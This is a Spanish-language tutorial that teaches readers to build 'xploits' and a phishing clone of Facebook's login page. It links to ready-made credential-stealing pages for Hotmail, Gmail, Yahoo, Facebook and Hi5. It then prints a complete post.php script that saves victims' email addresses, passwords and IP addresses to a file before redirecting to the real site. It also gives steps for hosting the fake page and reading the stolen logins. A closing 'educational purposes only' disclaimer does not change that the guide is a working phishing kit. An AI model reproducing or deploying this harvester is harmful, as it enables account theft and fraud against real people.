Bueno amigos ahora les enseñare a como crear un xploit para hotmail
Primero comensaremos por saber que es pues un xploit es:
El fin del Exploit puede ser violar las medidas de seguridad para poder
acceder al mismo de forma no autorizada y emplearlo en beneficio propio o
como origen de otros ataques a terceros, En palabras practicas es el robar informacion de cuentas no solo de hotmail sino tambien como es facebook, tweeter y otros por medio de mensajes falsosy tentadores.
Para esto utilizaremos una herramienta muy importante y util llamada dreamweaver que es un editor de paginas HTML,PHP, y otros, pero si lo quieres asi puedes hacerlo en el bloc de notas y solo cambias extensiones (para editar mucho mas complicado).
El link de descarga para los que no lo tienen:
Empesaremo por crear los siguientes archivos:
Postal Gusanito
http://bliser.com/xploitz.org/portal.php?xploits-gratis-2011-funcionando=xploit-hotmail-gusanito
Gmail
Postal Gusanito
http://bliser.com/xploitz.org/portal.php?xploits-gratis-2011-funcionando=xploit-gmail-gusanito
Yahoo
Postal Gusanito
http://bliser.com/xploitz.org/portal.php?xploits-gratis-2011-funcionando=xploit-yahoo-gusanito
http://bliser.com/xploitz.org/portal.php?xploits-gratis-2011-funcionando=xploit-facebook-soli
http://bliser.com/xploitz.org/portal.php?xploits-gratis-2011-funcionando=xploit-hi5-soli .
Ola amigos
Hoy en este próximo les
enseñare a crear nuestro propio phishing
Para
comenzar Que es un phishing??
Es un término informático que denomina un tipo de delito encuadrado
dentro del ámbito de las estafas cibernéticas, y que se comete mediante el uso
de un tipo de ingeniería social caracterizado por intentar adquirir información
confidencial de forma fraudulenta (como puede ser una contraseña o información
detallada sobre tarjetas de crédito u otra información bancaria). El estafador,
conocido como phisher, se hace pasar por una persona o empresa de
confianza en una aparente comunicación oficial electrónica, por lo común un
correo electrónico, o algún sistema de mensajería instantánea en esta ocasión
crearemos una página idéntica de
Facebook para adquirir información como correo electrónico, contraseña ye
incluso una dirección ip pero vamos a hacerlo nosotros modificando códigos de
fuente pero ustedes pueden elegir cualquier tipo de paginas
Que necesitaremos??
Notepad ++:
es un programa de edición para editar códigos, aquí dejo el link del programa:
http://notepad-plus-plus.org/
Filezilla:
Este programa para subir nuestra página en nuestro servidor, aquí
dejo el link del programa:
http://filezilla-project.org/
Post.php: será un pequeño
archivo en el cual la información se guardar correo electrónico, contraseña y hasta el ip de nuestra victima, aquí les dejare el link del
pequeño archivo:
http://www.mediafire.com/?mbb5pquren0m9a7
O pueden hacerlo en el bloc de notas pegando este código y cambiándole la
extensión de .TXT a .PHP (NOTA: TODAS LAS EXTENSIONES DEBEN IR
EN MINUSCULA) aquí el código:
=================post.php====================
<?php
$habbo = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$f = fopen("pruebasirve.html", "a");
fwrite ($f, 'Email: [<b><font
color="#FF1493">'.$habbo.'</font></b>] Password:
[<b><font
color="#1E90FF">'.$password.'</font></b>] IP:
[<b><font
color="#005700">'.$ip.'</font></b>]<br>');
fclose($f);
header("Location: https://www.facebook.com/");
?>
====================================================
ü Cuenta de hosting: quien será
nuestro servidor para subir nuestras páginas más adelante le ensañare como
crear una cuenta y que sitios son los adecuados
Comencemos buscando la página
inicial de Facebook en nuestro navegador, teniendo la página damos clic derecho en la página, seguido en ver los códigos nos aparecerá otra pestaña con los códigos de
nuestra página, ahora presionamos la tecla control
+ A para seleccionar todo el documento copiamos
Vamos a una carpeta creamos un
nuevo documento de texto, haciendo clic
derecho y nuevo donde se desplegará
otro menú de contenidos y seleccionamos documento de texto, abrimos el documento y pegamos
los códigos cerramos y guardamos, cambiamos el nombre y le ponemos index y modificamos la extensión del documento de texto la cual será .TXT la modificamos y le pondremos la extensión
.HTML damos enter,
y nos mostrara un aviso si deseamos cambiar
la extensión damos aceptar,
para cambiar la extensión si tu archivo no te
lo muestra al final del nombre por ejemplo
(prueba.txt) y solo te aparece (prueba)
en esa ventana damos herramientas
luego opciones de carpeta vamos a la opción ver hay una opción en la parte de abajo que dice (ocultar la extensión de archivos para tipos de archivos conocidos) desmarcamos
esa opción y damos aceptar nos dará la extensión del archivo después del
nombre damos clic derecho luego, cambiar nombre después del punto borramos TXT y escribimos HTML
damos enter y eso será todo
Al abrir ese archivo en nuestro navegador predeterminado nos aparece un error al cargar nuestra página se trata
de cuadros que aparecerán por todas
partes como veremos a continuación:
Esto lo solucionaremos
introduciendo un pequeño código en
nuestro código fuente instalado el programa notepad damos clic derecho en el nuestro archivo index.html y seleccionamos la opción edit with notepad nos vamos al
inicio del documento y pegamos
el código de corrección <meta
http-equiv="Content-Type" content="text/html:
charset=ISO-8859-1"></meta> damos guardar
y listo recargamos la página para
verificar recargamos y nuestro problema ya no se verá mas
Ahora lo que tenemos que hacer será modificar la página para que al dar clic en entrar
se re direccione a otra página o a la misma en el programa notepad
con el código abierto damos buscar y
buscamos action, que es una acción,
como sabemos que action es??? primeramente
antes a este tiene que haber un id sabiendo
esto después de action tiene que mostrarnos u signo igual (=) y una
página URL que es donde solicita la información eliminamos esa dirección y
copiamos la de nuestro post y quedara action=”post.php” damos guardar
Ahora con el mismo programa
modificaremos nuestro archivo post.php tendremos los 2 documentos abiertos en dicho programa en el archivo index buscamos name que es el nombre del formulario y nos aparecerá de esta forma name=”email” ese email lo pegamos en nuestro post en este lugar $habbo
= $_POST['email']; ósea la segunda
línea de nuestro post luego buscamos en esa misma línea el name de
contraseña que será pass este lo pegaremos
de igual forma en nuestro post en este lugar $password
= $_POST['pass']; así luego en
nuestro post donde dice ip es donde guardara la dirección ip si lo queremos así
si no borramos esa línea no hay ningún problema (si hiciste tú el post con el bloc de notas no es necesario hacer lo
anterior) luego en la línea de abajo $f =
fopen("pruebasirve.html", "a"); entre las comillas
pondremos el nombre del archivo donde se guardaran todos los usuarios y contraseñas cambiamos el nombre antes de HTML por cualquier otro en mi
caso como pueden ver puse pruebasirve luego
en la penúltima línea de nuestro post ponemos la página donde queremos que se redirección en este caso será Facebook
y quedara de este modo header("Location: https://www.facebook.com/");
guardamos y con esto ya
tenemos todo listo
Ahora estos archivos, index.html y post.php los subiremos a un
hosting ya registrados por medio del
programa filezilla
Ahora cargamos nuestra página que nos dio nuestro servidor que sería
nuestro hosting y al cargar
aparecerá nuestro phishing al cargar
esta página nos podemos topar con un
grave problema que sería la publicidad de la página para quitar este problema lo corregimos con otro código en el index tenemos que editarlo y nos vamos al principio y pegamos
<script languaje="javascript">
window.onload
= new Function(null)</script>
Luego al final del código pegamos lo siguiente
<noframes><iframe><noscript><xmp><pre>
Lo volvemos a subir de
igual manera ya editados lo reemplazamos y volvemos a recargar nuestra página y la publicidad
abra desaparecido ahora ya tenemos nuestro
phishing …
Si lo queremos probar
Introducimos un correo cualquiera y una contraseña falsa damos entrar se redirecionara de nuevo a la verdadera
página de Facebook retrocedemos y para ver
nuestro correo y contraseña en esa misma
página nos vamos a la barra de
búsqueda y después del link ponemos una pleca y el nombre del archivo
donde se guardaran nuestros datos en mi caso pruebasirve.html
damos enter y nos cargara una
página con su respectivo correo contraseña y numero de ip de este modo
Bueno esto es todo espero les
haya servido y ayudado no me hago
responsable de el mal uso de este material es solo para fines educativos.
A continuación les dejo un video
tutorial con las indicaciones que yo le
di por si no entendieron mucho =)